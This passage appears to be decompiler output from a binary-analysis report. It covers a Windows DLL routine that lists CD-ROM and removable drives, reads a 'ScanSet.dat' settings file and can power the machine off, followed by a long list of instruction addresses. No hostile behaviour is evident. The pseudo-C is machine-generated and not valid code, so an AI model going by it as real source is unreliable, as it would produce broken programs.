                                                                                                                														__eax =  *__ecx;
                                                                                                                														__edx =  *( *__ecx + 4);
                                                                                                                														_push(__ebp);
                                                                                                                														__eax =  *__edx();
                                                                                                                													}
                                                                                                                													__ebx = __ebx + 1;
                                                                                                                													__eflags = __ebx -  *(__esp + 0x14);
                                                                                                                													if(__eflags < 0) {
                                                                                                                														continue;
                                                                                                                													} else {
                                                                                                                														goto L82;
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L107;
                                                                                                                									}
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								goto L107;
                                                                                                                							case 4:
                                                                                                                								__esp + 0xb8 = GetWindowsDirectoryA(__esp + 0xb8, 0x32);
                                                                                                                								__ecx = __esp + 0x84;
                                                                                                                								__eax = GetSystemDirectoryA(__esp + 0x84, 0x32);
                                                                                                                								__edx = __esp + 0xb8;
                                                                                                                								__ecx = __esp;
                                                                                                                								 *(__esp + 0x18) = __esp;
                                                                                                                								__eax = E10005030(__edx, __ebp, __edx);
                                                                                                                								__ecx =  *0x1006f050; // 0x0
                                                                                                                								E1000EC00(__ecx, __edx, __eflags, __ecx) = __esp + 0x80;
                                                                                                                								__ecx = __esp + 0xb8;
                                                                                                                								__eflags = E1003C520(__ecx, __ecx, __esp + 0x80);
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push(__ecx);
                                                                                                                									__edx = __esp + 0x84;
                                                                                                                									__ecx = __esp;
                                                                                                                									 *(__esp + 0x18) = __esp;
                                                                                                                									_push(__edx);
                                                                                                                									L30:
                                                                                                                									__eax = E10005030(__edx, __ebp);
                                                                                                                									__ecx =  *0x1006f050; // 0x0
                                                                                                                									__eax = E1000EC00(__ecx, __edx, __eflags);
                                                                                                                								}
                                                                                                                								goto L82;
                                                                                                                							case 5:
                                                                                                                								__ebx = GetLogicalDriveStringsA;
                                                                                                                								__edi = GetLogicalDriveStringsA(0, 0);
                                                                                                                								_t138 = __edi + 1; // 0x1
                                                                                                                								__eax = _t138;
                                                                                                                								__esi = E100160EC(__eflags, _t138);
                                                                                                                								__eax = GetLogicalDriveStringsA(__edi, __esi);
                                                                                                                								__edi = __edi + 0xffffffff;
                                                                                                                								__eflags = __eax - __edi;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									__eax = __esi;
                                                                                                                									_t139 = __eax + 1; // 0x1
                                                                                                                									__edx = _t139;
                                                                                                                									do {
                                                                                                                										__cl =  *__eax;
                                                                                                                										__eax = __eax + 1;
                                                                                                                										__eflags = __cl;
                                                                                                                									} while (__cl != 0);
                                                                                                                									__eax = __eax - __edx;
                                                                                                                									__eflags = __eax;
                                                                                                                									__edi = __eax;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										__ebx = GetDriveTypeA;
                                                                                                                										do {
                                                                                                                											__eax = GetDriveTypeA(__esi);
                                                                                                                											__eflags = __eax - 5;
                                                                                                                											if(__eax == 5) {
                                                                                                                												__ecx = __esp;
                                                                                                                												 *(__esp + 0x18) = __esp;
                                                                                                                												__eax = E10005030(__edx, __ebp, __esi);
                                                                                                                												__ecx =  *0x1006f050; // 0x0
                                                                                                                												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
                                                                                                                											}
                                                                                                                											__esi =  &(__esi[__edi + 1]);
                                                                                                                											__eax = __esi;
                                                                                                                											__edx = __eax + 1;
                                                                                                                											do {
                                                                                                                												__cl =  *__eax;
                                                                                                                												__eax = __eax + 1;
                                                                                                                												__eflags = __cl;
                                                                                                                											} while (__cl != 0);
                                                                                                                											__eax = __eax - __edx;
                                                                                                                											__eflags = __eax;
                                                                                                                											__edi = __eax;
                                                                                                                										} while (__eflags != 0);
                                                                                                                									}
                                                                                                                									goto L82;
                                                                                                                								}
                                                                                                                								goto L107;
                                                                                                                							case 6:
                                                                                                                								__ebx = GetLogicalDriveStringsA;
                                                                                                                								__edi = GetLogicalDriveStringsA(0, 0);
                                                                                                                								_t144 = __edi + 1; // 0x1
                                                                                                                								__ecx = _t144;
                                                                                                                								__esi = E100160EC(__eflags, _t144);
                                                                                                                								__eax = GetLogicalDriveStringsA(__edi, __esi);
                                                                                                                								__edi = __edi + 0xffffffff;
                                                                                                                								__eflags = __eax - __edi;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L20;
                                                                                                                								} else {
                                                                                                                									__eax = __esi;
                                                                                                                									_t145 = __eax + 1; // 0x1
                                                                                                                									__edx = _t145;
                                                                                                                									do {
                                                                                                                										__cl =  *__eax;
                                                                                                                										__eax = __eax + 1;
                                                                                                                										__eflags = __cl;
                                                                                                                									} while (__cl != 0);
                                                                                                                									__eax = __eax - __edx;
                                                                                                                									__eflags = __eax;
                                                                                                                									__edi = __eax;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										__ebx = GetDriveTypeA;
                                                                                                                										do {
                                                                                                                											__eax = GetDriveTypeA(__esi);
                                                                                                                											__eflags = __eax - 2;
                                                                                                                											if(__eax == 2) {
                                                                                                                												__ecx = __esp;
                                                                                                                												 *(__esp + 0x18) = __esp;
                                                                                                                												__eax = E10005030(__edx, __ebp, __esi);
                                                                                                                												__ecx =  *0x1006f050; // 0x0
                                                                                                                												__eax = E1000EC00(__ecx, __edx, __eflags, __ecx);
                                                                                                                											}
                                                                                                                											__esi =  &(__esi[__edi + 1]);
                                                                                                                											__eax = __esi;
                                                                                                                											__edx = __eax + 1;
                                                                                                                											do {
                                                                                                                												__cl =  *__eax;
                                                                                                                												__eax = __eax + 1;
                                                                                                                												__eflags = __cl;
                                                                                                                											} while (__cl != 0);
                                                                                                                											__eax = __eax - __edx;
                                                                                                                											__eflags = __eax;
                                                                                                                											__edi = __eax;
                                                                                                                										} while (__eflags != 0);
                                                                                                                									}
                                                                                                                									goto L82;
                                                                                                                								}
                                                                                                                								goto L107;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t289 = E1000CD90(_t421);
                                                                                                                					 *(_t418 + 0x20) = _t289;
                                                                                                                					_t290 =  *((intOrPtr*)(_t289 + 8));
                                                                                                                					_t329 = 0;
                                                                                                                					 *(_t418 + 0x14) = _t290;
                                                                                                                					if(_t290 <= 0) {
                                                                                                                						goto L15;
                                                                                                                					} else {
                                                                                                                						while(1) {
                                                                                                                							_t291 = E100173A6();
                                                                                                                							_t423 = _t291;
                                                                                                                							_t331 = 0 | _t423 != 0x00000000;
                                                                                                                							if(_t423 != 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t390 =  *_t291;
                                                                                                                							_t331 = _t291;
                                                                                                                							 *(_t418 + 0x24) =  *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0xc))))() + 0x10;
                                                                                                                							 *(_t418 + 0xf4) = 0;
                                                                                                                							if(_t329 < 0) {
                                                                                                                								L18:
                                                                                                                								E1001729E(_t329, _t331, _t407, _t413, _t436);
                                                                                                                								L19:
                                                                                                                								_t329 = GetLogicalDriveStringsA;
                                                                                                                								_t410 = GetLogicalDriveStringsA(0, 0);
                                                                                                                								_t62 = _t410 + 1; // 0x1
                                                                                                                								_t280 = E100160EC(_t436, _t62);
                                                                                                                								_t418 = _t418 + 4;
                                                                                                                								_t413 = _t280;
                                                                                                                								_t281 = GetLogicalDriveStringsA(_t410, _t413);
                                                                                                                								_t411 = _t410 + 0xffffffff;
                                                                                                                								_t437 = _t281 - _t410 + 0xffffffff;
                                                                                                                								if(_t281 == _t410 + 0xffffffff) {
                                                                                                                									_t282 = _t413;
                                                                                                                									_t63 =  &(_t282[1]); // 0x1
                                                                                                                									_t398 = _t63;
                                                                                                                									do {
                                                                                                                										_t365 =  *_t282;
                                                                                                                										_t282 =  &(_t282[1]);
                                                                                                                										__eflags = _t365;
                                                                                                                									} while (_t365 != 0);
                                                                                                                									_t283 = _t282 - _t398;
                                                                                                                									__eflags = _t283;
                                                                                                                									_t412 = _t283;
                                                                                                                									while(__eflags != 0) {
                                                                                                                										 *(_t418 + 0x18) = _t418;
                                                                                                                										E10005030(_t398, _t415, _t413);
                                                                                                                										_t367 =  *0x1006f050; // 0x0
                                                                                                                										E1000EC00(_t367, _t398, __eflags, _t365);
                                                                                                                										_t413 =  &(_t413[_t412 + 1]);
                                                                                                                										_t286 = _t413;
                                                                                                                										_t398 =  &(_t286[1]);
                                                                                                                										do {
                                                                                                                											_t365 =  *_t286;
                                                                                                                											_t286 =  &(_t286[1]);
                                                                                                                											__eflags = _t365;
                                                                                                                										} while (_t365 != 0);
                                                                                                                										_t287 = _t286 - _t398;
                                                                                                                										__eflags = _t287;
                                                                                                                										_t412 = _t287;
                                                                                                                									}
                                                                                                                									L82:
                                                                                                                									_t391 =  *0x1006f050; // 0x0
                                                                                                                									TerminateThread(_t391[0x28c], 0);
                                                                                                                									_t332 =  *0x1006f050; // 0x0
                                                                                                                									SendMessageA(_t332[0x20], 0x111, 0xfff555ee, 0xf55555ee);
                                                                                                                									E1002181C(_t329, 0, _t413, __eflags, 0x10058350, 0, 0);
                                                                                                                									_t230 =  *0x1006f050; // 0x0
                                                                                                                									_t230[0x10e8] = 0;
                                                                                                                									_t333 =  *0x1006f050; // 0x0
                                                                                                                									_t333[0x10ec] = 0;
                                                                                                                									_t390 =  *0x1006f050; // 0x0
                                                                                                                									 *((intOrPtr*)(_t390 + 0x10f0)) = 0;
                                                                                                                									_t334 =  *0x1006f050; // 0x0
                                                                                                                									E1001D2C4( &(_t334[0x4fc]), 0x10056948);
                                                                                                                									_t336 =  *0x1006f050; // 0x0
                                                                                                                									E1001D2C4( &(_t336[0x454]), 0x10056948);
                                                                                                                									_t338 =  *0x1006f050; // 0x0
                                                                                                                									E1001D39A( &(_t338[0x4a8]), 1);
                                                                                                                									_t340 =  *0x1006f050; // 0x0
                                                                                                                									E1001D2C4( &(_t340[0x304]), 0x10056948);
                                                                                                                									_t342 =  *0x1006f050; // 0x0
                                                                                                                									E1001D39A( &(_t342[0x400]), 0);
                                                                                                                									_t344 =  *0x1006f050; // 0x0
                                                                                                                									E1001D39A( &(_t344[0x3ac]), 0);
                                                                                                                									E100205E2(_t418 + 0x70, __eflags);
                                                                                                                									_push(0);
                                                                                                                									_push(0x40);
                                                                                                                									_push("Setting\\ScanSet.dat");
                                                                                                                									 *((intOrPtr*)(_t418 + 0x100)) = 6;
                                                                                                                									__eflags = E10020A24(_t418 + 0x7c, _t390, __eflags);
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_t242 =  *((intOrPtr*)(_t418 + 0x70));
                                                                                                                										_t393 =  *((intOrPtr*)(_t242 + 0x28));
                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t242 + 0x28))))(0, 0, 0);
                                                                                                                										_push(0);
                                                                                                                										_push(0x1000);
                                                                                                                										_push(1);
                                                                                                                										_push(_t418 + 0x7c);
                                                                                                                										E10020058(_t329, _t418 + 0x38,  *((intOrPtr*)(_t242 + 0x28)), 0, _t413, __eflags);
                                                                                                                										__eflags =  *(_t418 + 0x40) & 0x00000001;
                                                                                                                										 *(_t418 + 0xf4) = 7;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push( *((intOrPtr*)(_t418 + 0x3c)));
                                                                                                                											_push(4);
                                                                                                                											E10020287(_t329, _t393, 0, _t413, __eflags);
                                                                                                                										}
                                                                                                                										_t246 =  *(_t418 + 0x50);
                                                                                                                										_t355 =  *((intOrPtr*)(_t418 + 0x54));
                                                                                                                										_t394 =  &(_t246[1]);
                                                                                                                										__eflags =  &(_t246[1]) - _t355;
                                                                                                                										if( &(_t246[1]) > _t355) {
                                                                                                                											__eflags = _t246 - _t355 + 4;
                                                                                                                											E1001FADC(_t418 + 0x2c, _t394, _t246 - _t355 + 4);
                                                                                                                											_t355 =  *((intOrPtr*)(_t418 + 0x54));
                                                                                                                											_t246 =  *(_t418 + 0x50);
                                                                                                                										}
                                                                                                                										_t247 =  &(_t246[1]);
                                                                                                                										__eflags =  *(_t418 + 0x40) & 0x00000001;
                                                                                                                										 *(_t418 + 0x50) = _t247;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push( *((intOrPtr*)(_t418 + 0x3c)));
                                                                                                                											_push(4);
                                                                                                                											_t247 = E10020287(_t329, _t394, 0, _t413, __eflags);
                                                                                                                										}
                                                                                                                										_t179 =  &(_t247[1]); // 0x4
                                                                                                                										_t395 = _t179;
                                                                                                                										__eflags = _t179 - _t355;
                                                                                                                										if(_t179 > _t355) {
                                                                                                                											__eflags = _t247 - _t355 + 4;
                                                                                                                											E1001FADC(_t418 + 0x2c, _t395, _t247 - _t355 + 4);
                                                                                                                											_t355 =  *((intOrPtr*)(_t418 + 0x54));
                                                                                                                											_t247 =  *(_t418 + 0x50);
                                                                                                                										}
                                                                                                                										_t248 =  &(_t247[1]);
                                                                                                                										__eflags =  *(_t418 + 0x40) & 0x00000001;
                                                                                                                										 *(_t418 + 0x50) = _t248;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push( *((intOrPtr*)(_t418 + 0x3c)));
                                                                                                                											_push(4);
                                                                                                                											_t248 = E10020287(_t329, _t395, 0, _t413, __eflags);
                                                                                                                										}
                                                                                                                										_t188 =  &(_t248[1]); // 0x4
                                                                                                                										_t396 = _t188;
                                                                                                                										__eflags = _t188 - _t355;
                                                                                                                										if(_t188 > _t355) {
                                                                                                                											__eflags = _t248 - _t355 + 4;
                                                                                                                											E1001FADC(_t418 + 0x2c, _t396, _t248 - _t355 + 4);
                                                                                                                											_t355 =  *((intOrPtr*)(_t418 + 0x54));
                                                                                                                											_t248 =  *(_t418 + 0x50);
                                                                                                                										}
                                                                                                                										_t249 =  &(_t248[1]);
                                                                                                                										__eflags =  *(_t418 + 0x40) & 0x00000001;
                                                                                                                										 *(_t418 + 0x50) = _t249;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push( *((intOrPtr*)(_t418 + 0x3c)));
                                                                                                                											_push(4);
                                                                                                                											_t249 = E10020287(_t329, _t396, 0, _t413, __eflags);
                                                                                                                										}
                                                                                                                										_t197 =  &(_t249[1]); // 0x4
                                                                                                                										_t397 = _t197;
                                                                                                                										__eflags = _t197 - _t355;
                                                                                                                										if(_t197 > _t355) {
                                                                                                                											__eflags = _t249 - _t355 + 4;
                                                                                                                											E1001FADC(_t418 + 0x2c, _t397, _t249 - _t355 + 4);
                                                                                                                											_t355 =  *((intOrPtr*)(_t418 + 0x54));
                                                                                                                											_t249 =  *(_t418 + 0x50);
                                                                                                                										}
                                                                                                                										_t250 =  &(_t249[1]);
                                                                                                                										__eflags =  *(_t418 + 0x40) & 0x00000001;
                                                                                                                										 *(_t418 + 0x50) = _t250;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_push( *((intOrPtr*)(_t418 + 0x3c)));
                                                                                                                											_push(4);
                                                                                                                											_t250 = E10020287(_t329, _t397, 0, _t413, __eflags);
                                                                                                                										}
                                                                                                                										_t206 =  &(_t250[1]); // 0x4
                                                                                                                										_t390 = _t206;
                                                                                                                										__eflags = _t206 - _t355;
                                                                                                                										if(__eflags > 0) {
                                                                                                                											__eflags = _t250 - _t355 + 4;
                                                                                                                											E1001FADC(_t418 + 0x2c, _t390, _t250 - _t355 + 4);
                                                                                                                											_t250 =  *(_t418 + 0x50);
                                                                                                                										}
                                                                                                                										_t413 =  *_t250;
                                                                                                                										 *(_t418 + 0x50) =  &(_t250[1]);
                                                                                                                										E1001FEB3(_t418 + 0x28, __eflags);
                                                                                                                										E10020580(_t329, _t418 + 0x70);
                                                                                                                										__eflags =  *_t250;
                                                                                                                										if(__eflags == 0) {
                                                                                                                											ExitWindowsEx(8, 0);
                                                                                                                										}
                                                                                                                										 *(_t418 + 0xf4) = 6;
                                                                                                                										E1002001A(_t329, _t418 + 0x28, _t390, 0, _t413, __eflags);
                                                                                                                									}
                                                                                                                									 *(_t418 + 0xf4) = 0xffffffff;
                                                                                                                									E100206EF(_t329, _t418 + 0x70, _t390, 0, _t413, __eflags);
                                                                                                                								} else {
                                                                                                                									L20:
                                                                                                                									E1002181C(_t329, _t411, _t413, _t437, 0x100587a4, 0, 0);
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t331 =  *(_t418 + 0x20);
                                                                                                                								_t426 = _t329 -  *((intOrPtr*)(_t331 + 8));
                                                                                                                								if(_t329 >=  *((intOrPtr*)(_t331 + 8))) {
                                                                                                                									goto L18;
                                                                                                                								} else {
                                                                                                                									_push( *((intOrPtr*)(_t331 + 4)) + _t329 * 4);
                                                                                                                									E10001FF0(_t418 + 0x28);
                                                                                                                									_t370 =  *0x1006f050; // 0x0
                                                                                                                									_t413 =  *(_t418 + 0x24);
                                                                                                                									_t371 =  &(_t370[0x4fc]);
                                                                                                                									E1001D2C4(_t371, _t413);
                                                                                                                									_push(_t371);
                                                                                                                									_t415 = _t413 - 0x10;
                                                                                                                									 *(_t418 + 0x20) = _t418;
                                                                                                                									_t407 = _t418;
                                                                                                                									_t299 = E10001080(_t329, _t415);
                                                                                                                									_t420 = _t418 + 4;
                                                                                                                									 *_t418 = _t299 + 0x10;
                                                                                                                									_t373 =  *0x1006f050; // 0x0
                                                                                                                									E1000E6F0(_t373, _t331, _t426, _t420 + 0x1c);
                                                                                                                									_t390 =  *(_t420 + 0x18);
                                                                                                                									 *((char*)(_t420 + 0xfc)) = 1;
                                                                                                                									_t302 = E1003BD06( *(_t420 + 0x18), 0x10056948);
                                                                                                                									_t418 = _t420 + 8;
                                                                                                                									if((_t302 & 0xffffff00 | _t302 != 0x00000000) != 0) {
                                                                                                                										_t322 =  *0x1006f050; // 0x0
                                                                                                                										_t27 =  &(_t322[0x358]); // 0x358
                                                                                                                										E10026562(_t27, 1, _t322[0x10ec], 0x10056948, 0, 0, 0, 0);
                                                                                                                										_t324 =  *0x1006f050; // 0x0
                                                                                                                										_t29 =  &(_t324[0x358]); // 0x358
                                                                                                                										E1002637C(_t29, _t324[0x10ec], 0, _t413);
                                                                                                                										_t390 =  *(_t418 + 0x18);
                                                                                                                										_t326 =  *0x1006f050; // 0x0
                                                                                                                										_t32 =  &(_t326[0x358]); // 0x358
                                                                                                                										E1002637C(_t32, _t326[0x10ec], 1,  *(_t418 + 0x18));
                                                                                                                										_t328 =  *0x1006f050; // 0x0
                                                                                                                										_t328[0x10ec] = _t328[0x10ec] + 1;
                                                                                                                									}
                                                                                                                									_t304 =  *0x1006f050; // 0x0
                                                                                                                									_t304[0x10e8] = _t304[0x10e8] + 1;
                                                                                                                									_t305 = E100173A6();
                                                                                                                									_t430 = _t305;
                                                                                                                									_t331 = 0 | _t430 != 0x00000000;
                                                                                                                									if(_t430 != 0) {
                                                                                                                										break;
                                                                                                                									} else {
                                                                                                                										 *((intOrPtr*)(_t418 + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *_t305 + 0xc))))() + 0x10;
                                                                                                                										_t309 =  *0x1006f050; // 0x0
                                                                                                                										_push(_t309[0x10f0]);
                                                                                                                										_push(_t309[0x10ec]);
                                                                                                                										 *((char*)(_t418 + 0x108)) = 2;
                                                                                                                										E10003500(_t418 + 0x28, 0x1005873c, _t309[0x10e8]);
                                                                                                                										_t378 =  *0x1006f050; // 0x0
                                                                                                                										_t413 =  *(_t418 + 0x30);
                                                                                                                										_t418 = _t418 + 0x14;
                                                                                                                										_t379 =  &(_t378[0x304]);
                                                                                                                										E1001D2C4(_t379, _t413);
                                                                                                                										_t313 = _t413 - 0x10;
                                                                                                                										 *(_t418 + 0xf4) = 1;
                                                                                                                										_t402 =  &(_t313[3]);
                                                                                                                										asm("lock xadd [edx], ecx");
                                                                                                                										if((_t379 | 0xffffffff) - 1 <= 0) {
                                                                                                                											_t402 =  *( *_t313);
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t402 + 4))))(_t313);
                                                                                                                										}
                                                                                                                										_t315 =  *(_t418 + 0x18) + 0xfffffff0;
                                                                                                                										 *(_t418 + 0xf4) = 0;
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										_t404 = (_t402 | 0xffffffff) - 1;
                                                                                                                										if(_t404 <= 0) {
                                                                                                                											_t404 =  *( *_t315);
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t404 + 4))))(_t315);
                                                                                                                										}
                                                                                                                										 *(_t418 + 0xf4) = 0xffffffff;
                                                                                                                										_t331 =  &(_t415[3]);
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										_t390 = (_t404 | 0xffffffff) - 1;
                                                                                                                										if((_t404 | 0xffffffff) - 1 <= 0) {
                                                                                                                											_t331 =  *_t415;
                                                                                                                											_t316 =  *( *_t415);
                                                                                                                											_t390 =  *(_t316 + 4);
                                                                                                                											 *( *(_t316 + 4))(_t415);
                                                                                                                										}
                                                                                                                										_t329 = _t329 + 1;
                                                                                                                										if(_t329 <  *(_t418 + 0x14)) {
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											goto L15;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L107;
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						E10001000(_t331, _t390, 0x80004005);
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L107:
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t418 + 0xec));
                                                                                                                				_pop(_t409);
                                                                                                                				_pop(_t414);
                                                                                                                				_pop(_t330);
                                                                                                                				return E1003B437(0, _t330,  *(_t418 + 0xd4) ^ _t418, _t390, _t409, _t414);
                                                                                                                			}
                                                                                                                0x1000f7c1
                                                                                                                0x1000f7c4
                                                                                                                0x1000f7c8
                                                                                                                0x1000f7ca
                                                                                                                0x1000f7d5
                                                                                                                0x00000000
                                                                                                                0x1000f7db
                                                                                                                0x1000f7db
                                                                                                                0x1000f7df
                                                                                                                0x1000f7e2
                                                                                                                0x00000000
                                                                                                                0x1000f7e8
                                                                                                                0x1000f7e8
                                                                                                                0x1000f7ed
                                                                                                                0x1000f7f0
                                                                                                                0x1000f7f1
                                                                                                                0x1000f7f5
                                                                                                                0x1000f7fa
                                                                                                                0x1000f800
                                                                                                                0x1000f805
                                                                                                                0x1000f80b
                                                                                                                0x1000f810
                                                                                                                0x1000f811
                                                                                                                0x1000f814
                                                                                                                0x1000f818
                                                                                                                0x1000f81b
                                                                                                                0x1000f820
                                                                                                                0x1000f823
                                                                                                                0x1000f826
                                                                                                                0x1000f82a
                                                                                                                0x1000f82d
                                                                                                                0x1000f833
                                                                                                                0x1000f838
                                                                                                                0x1000f842
                                                                                                                0x1000f84a
                                                                                                                0x1000f852
                                                                                                                0x1000f854
                                                                                                                0x1000f857
                                                                                                                0x1000f859
                                                                                                                0x1000f85b
                                                                                                                0x1000f860
                                                                                                                0x1000f874
                                                                                                                0x1000f874
                                                                                                                0x1000f87c
                                                                                                                0x1000f881
                                                                                                                0x1000f886
                                                                                                                0x1000f890
                                                                                                                0x1000f890
                                                                                                                0x1000f896
                                                                                                                0x1000f89b
                                                                                                                0x1000f89f
                                                                                                                0x1000f8a4
                                                                                                                0x1000f8ae
                                                                                                                0x1000f8ae
                                                                                                                0x1000f8b4
                                                                                                                0x1000f8b9
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8be
                                                                                                                0x1000f8c5
                                                                                                                0x1000f8ca
                                                                                                                0x1000f8d1
                                                                                                                0x1000f8d6
                                                                                                                0x1000f8d8
                                                                                                                0x1000f8da
                                                                                                                0x1000f8dd
                                                                                                                0x1000f8df
                                                                                                                0x00000000
                                                                                                                0x1000f8e5
                                                                                                                0x1000f8e5
                                                                                                                0x1000f8e7
                                                                                                                0x1000f8ec
                                                                                                                0x1000f8ee
                                                                                                                0x1000f8f1
                                                                                                                0x1000f8f5
                                                                                                                0x1000f8fa
                                                                                                                0x1000f900
                                                                                                                0x1000f906
                                                                                                                0x1000f90c
                                                                                                                0x1000f90d
                                                                                                                0x1000f90f
                                                                                                                0x1000f919
                                                                                                                0x1000f921
                                                                                                                0x1000f926
                                                                                                                0x1000f92c
                                                                                                                0x1000f934
                                                                                                                0x1000f93a
                                                                                                                0x1000f93f
                                                                                                                0x1000f942
                                                                                                                0x1000f94a
                                                                                                                0x1000f94d
                                                                                                                0x1000f950
                                                                                                                0x1000f954
                                                                                                                0x1000f955
                                                                                                                0x1000f957
                                                                                                                0x1000f959
                                                                                                                0x1000f95b
                                                                                                                0x1000f95d
                                                                                                                0x1000f961
                                                                                                                0x1000f961
                                                                                                                0x1000f963
                                                                                                                0x1000f967
                                                                                                                0x1000f96a
                                                                                                                0x1000f972
                                                                                                                0x1000f975
                                                                                                                0x1000f978
                                                                                                                0x1000f97c
                                                                                                                0x1000f97d
                                                                                                                0x1000f97f
                                                                                                                0x1000f981
                                                                                                                0x1000f983
                                                                                                                0x1000f985
                                                                                                                0x1000f989
                                                                                                                0x1000f989
                                                                                                                0x1000f98b
                                                                                                                0x1000f996
                                                                                                                0x1000f999
                                                                                                                0x1000f99c
                                                                                                                0x1000f9a0
                                                                                                                0x1000f9a1
                                                                                                                0x1000f9a3
                                                                                                                0x1000f9a5
                                                                                                                0x1000f9a8
                                                                                                                0x1000f9aa
                                                                                                                0x1000f9ad
                                                                                                                0x1000f9ae
                                                                                                                0x1000f9ae
                                                                                                                0x1000f9b0
                                                                                                                0x1000f9b3
                                                                                                                0x1000f9b7
                                                                                                                0x00000000
                                                                                                                0x1000f9bd
                                                                                                                0x00000000
                                                                                                                0x1000f9bd
                                                                                                                0x1000f9b7
                                                                                                                0x1000f8df
                                                                                                                0x1000f7e2
                                                                                                                0x00000000
                                                                                                                0x1000f7d5
                                                                                                                0x00000000
                                                                                                                0x1000f7a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f9cc
                                                                                                                0x1000f9d4
                                                                                                                0x1000f9dc
                                                                                                                0x1000f9e3
                                                                                                                0x1000f9ea
                                                                                                                0x1000f9ec
                                                                                                                0x1000f9f1
                                                                                                                0x1000f9f6
                                                                                                                0x1000fa01
                                                                                                                0x1000fa09
                                                                                                                0x1000fa19
                                                                                                                0x1000fa1b
                                                                                                                0x1000fa21
                                                                                                                0x1000fa22
                                                                                                                0x1000fa29
                                                                                                                0x1000fa2b
                                                                                                                0x1000fa2f
                                                                                                                0x1000f6e1
                                                                                                                0x1000f6e1
                                                                                                                0x1000f6e6
                                                                                                                0x1000f6ec
                                                                                                                0x1000f6ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000fa35
                                                                                                                0x1000fa41
                                                                                                                0x1000fa43
                                                                                                                0x1000fa43
                                                                                                                0x1000fa4f
                                                                                                                0x1000fa53
                                                                                                                0x1000fa55
                                                                                                                0x1000fa58
                                                                                                                0x1000fa5a
                                                                                                                0x00000000
                                                                                                                0x1000fa60
                                                                                                                0x1000fa60
                                                                                                                0x1000fa62
                                                                                                                0x1000fa62
                                                                                                                0x1000fa65
                                                                                                                0x1000fa65
                                                                                                                0x1000fa67
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6a
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa6e
                                                                                                                0x1000fa70
                                                                                                                0x1000fa72
                                                                                                                0x1000fa78
                                                                                                                0x1000fa80
                                                                                                                0x1000fa81
                                                                                                                0x1000fa83
                                                                                                                0x1000fa86
                                                                                                                0x1000fa89
                                                                                                                0x1000fa8b
                                                                                                                0x1000fa90
                                                                                                                0x1000fa95
                                                                                                                0x1000fa9b
                                                                                                                0x1000fa9b
                                                                                                                0x1000faa0
                                                                                                                0x1000faa4
                                                                                                                0x1000faa6
                                                                                                                0x1000fab0
                                                                                                                0x1000fab0
                                                                                                                0x1000fab2
                                                                                                                0x1000fab5
                                                                                                                0x1000fab5
                                                                                                                0x1000fab9
                                                                                                                0x1000fab9
                                                                                                                0x1000fabb
                                                                                                                0x1000fabb
                                                                                                                0x1000fabf
                                                                                                                0x00000000
                                                                                                                0x1000fa72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000fac4
                                                                                                                0x1000fad0
                                                                                                                0x1000fad2
                                                                                                                0x1000fad2
                                                                                                                0x1000fade
                                                                                                                0x1000fae2
                                                                                                                0x1000fae4
                                                                                                                0x1000fae7
                                                                                                                0x1000f570
                                                                                                                0x1000f571
                                                                                                                0x1000f57d
                                                                                                                0x1000f585
                                                                                                                0x1000f58a
                                                                                                                0x1000f590
                                                                                                                0x1000f594
                                                                                                                0x1000f598
                                                                                                                0x1000f59e
                                                                                                                0x1000f5a3
                                                                                                                0x1000f5a6
                                                                                                                0x1000f5ae
                                                                                                                0x1000f5b4
                                                                                                                0x1000f5bb
                                                                                                                0x1000f5bf
                                                                                                                0x1000f5c5
                                                                                                                0x1000f5c5
                                                                                                                0x1000f5cb
                                                                                                                0x1000f5ce
                                                                                                                0x1000f5dc
                                                                                                                0x1000f5e0
                                                                                                                0x1000f5e3
                                                                                                                0x1000f5e7
                                                                                                                0x1000f5ed
                                                                                                                0x1000f5ed
                                                                                                                0x1000f5ef
                                                                                                                0x1000f5fa
                                                                                                                0x1000f600
                                                                                                                0x1000f604
                                                                                                                0x1000f607
                                                                                                                0x1000f609
                                                                                                                0x1000f60c
                                                                                                                0x1000f60e
                                                                                                                0x1000f612
                                                                                                                0x1000f612
                                                                                                                0x1000f614
                                                                                                                0x1000f61b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000f61b
                                                                                                                0x1000f543
                                                                                                                0x1000f446
                                                                                                                0x00000000
                                                                                                                0x1000f439
                                                                                                                0x1000f638
                                                                                                                0x1000f63d
                                                                                                                0x00000000
                                                                                                                0x1000f63d
